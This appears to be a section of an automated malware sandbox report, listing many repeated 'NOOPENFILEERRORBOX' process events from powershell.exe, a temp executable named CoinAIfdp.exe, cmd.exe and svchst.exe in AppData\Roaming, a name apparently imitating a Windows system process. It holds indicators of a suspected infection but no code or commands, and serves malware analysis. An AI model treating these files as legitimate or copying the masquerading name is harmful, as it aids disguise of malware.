                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
